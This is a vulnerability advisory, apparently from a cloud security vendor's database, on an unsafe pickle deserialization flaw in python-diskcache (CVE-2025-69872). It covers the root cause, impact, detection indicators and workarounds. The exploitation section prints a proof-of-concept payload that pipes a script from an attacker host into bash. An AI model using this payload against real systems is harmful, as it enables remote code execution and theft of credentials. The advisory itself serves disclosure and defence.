
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-69872 is an unsafe pickle deserialization vulnerability in DiskCache (python-diskcache) affecting all versions through 5.6.3. The library uses Python's pickle module as its default serialization method without any safety warnings or mitigations, allowing an attacker with write access to the cache directory to achieve arbitrary code execution when a victim application reads from the cache. The vulnerability was discovered on 2025-12-16 by Ethan Taebeom Kim of Cremit and published by MITRE on 2026-02-11. It carries a CVSS v3.1 score of 9.8 (Critical) per Feedly/NVD estimates, though the researcher-assigned CVSS v3.1 score is 7.3 (High) and the GitHub Advisory Database rates it Moderate (5.2 CVSS v4) (GitHub Advisory, Researcher Disclosure).
The root cause is the use of Python's pickle module as the default serializer in diskcache/core.py, classified as CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection). Specifically, pickle.load() and pickle.loads() are called at three locations — line 177 (deserializing cache keys), line 282 (deserializing from .val files), and line 284 (deserializing from SQLite) — without any integrity checks or input validation. The attack exploits Python's pickle __reduce__ mechanism, which allows arbitrary callables (e.g., os.system, subprocess.call) to be invoked during deserialization; an attacker crafts a malicious pickle payload and writes it directly to the cache's SQLite database (cache.db) or as a .val file, which is then automatically deserialized when the victim application calls cache.get(). The precondition is filesystem-level write access to the cache directory, achievable via misconfigured permissions (e.g., world-writable /tmp paths) or compromised shared container volumes (GitHub Advisory, Researcher Disclosure).
Successful exploitation grants the attacker arbitrary code execution within the victim application's process, with all associated privileges, enabling full system compromise. This includes access to environment variables (often containing API keys and database credentials), file system access, and network connectivity, facilitating data exfiltration and credential theft. In containerized or multi-tenant environments where cache directories are shared across pods or services, a single compromised container can be used as a pivot point for lateral movement to other services. With over 2 million monthly PyPI downloads and 500+ dependent packages — including production use in Django, AWS Lambda, Kubernetes, and ML pipelines — the potential blast radius is substantial (Researcher Disclosure).
A proof-of-concept (PoC) is publicly available in the researcher's disclosure, demonstrating both the attacker-side payload injection and victim-side trigger via a standard cache.get() call. There is no confirmed evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.10% (0.041% per GitHub Advisory, 0.102% per Feedly), placing it in a low-to-moderate exploitation probability range. IBM has issued advisories for affected products including IBM Cloud Pak for AIOps, IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage (GitHub Advisory, IBM Advisory).
/tmp paths.cache.db.__reduce__ method that returns a malicious callable:import pickle, os
class RCEPayload:
def __reduce__(self):
return (os.system, ('curl http://attacker.com/shell.sh | bash',))
malicious_data = pickle.dumps(RCEPayload())cache.db) using any SQLite client, inserting a row that DiskCache will read as a cached value for a known or guessable key.cache.get('evil_key') or any cache read operation. DiskCache internally calls pickle.load() on the stored data, executing the attacker's payload with the application's privileges.cache.db SQLite files in cache directories; presence of .val files with anomalous binary content (pickle magic bytes \x80\x04 or \x80\x05); new files created in cache directories by unexpected users or processes.bash, sh, curl, wget, python) that are not part of normal application behavior; unexpected outbound network connections from the application process.pickle.UnpicklingError if payload fails, or unexpected os.system calls in audit logs); OS-level audit logs (auditd) recording writes to cache directories by unexpected users.As of the advisory publication, no patched version of python-diskcache beyond 5.6.3 has been released; the GitHub Advisory lists no patched versions. The primary workaround is to switch from the default pickle serializer to JSONDisk, which uses JSON serialization and cannot execute arbitrary code during deserialization:
from diskcache import Cache, JSONDisk
cache = Cache('/path/to/cache', disk=JSONDisk)Note that JSONDisk only supports JSON-serializable types. Additionally, restrict cache directory permissions to prevent unauthorized write access (chmod 700 /path/to/cache; chown appuser:appuser /path/to/cache), and in containerized environments, avoid sharing cache volumes across trust boundaries. IBM has issued product-specific advisories for affected IBM products (GitHub Advisory, IBM Advisory, IBM Fusion Advisory).
IBM issued two security bulletins addressing the impact of CVE-2025-69872 on IBM Cloud Pak for AIOps and IBM Fusion product lines (IBM Advisory, IBM Fusion Advisory). The vulnerability was noted in a February 2026 Linux patch Wednesday roundup and covered by Linux security news outlets following Fedora package updates for python-diskcache. The FastMCP project (v3.0.0) and ag2 (v0.12.0) referenced the vulnerability in their release notes as a dependency concern. Community discussion has been limited, with no significant controversy or widespread alarm given the local attack vector requirement.
Fix availability across major Linux distributions and their releases.
devel
diskcache
jammy
diskcache
jammy (esm-apps)
diskcache
noble
diskcache
noble (esm-apps)
diskcache
resolute
diskcache
resolute (esm-apps)
diskcache
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."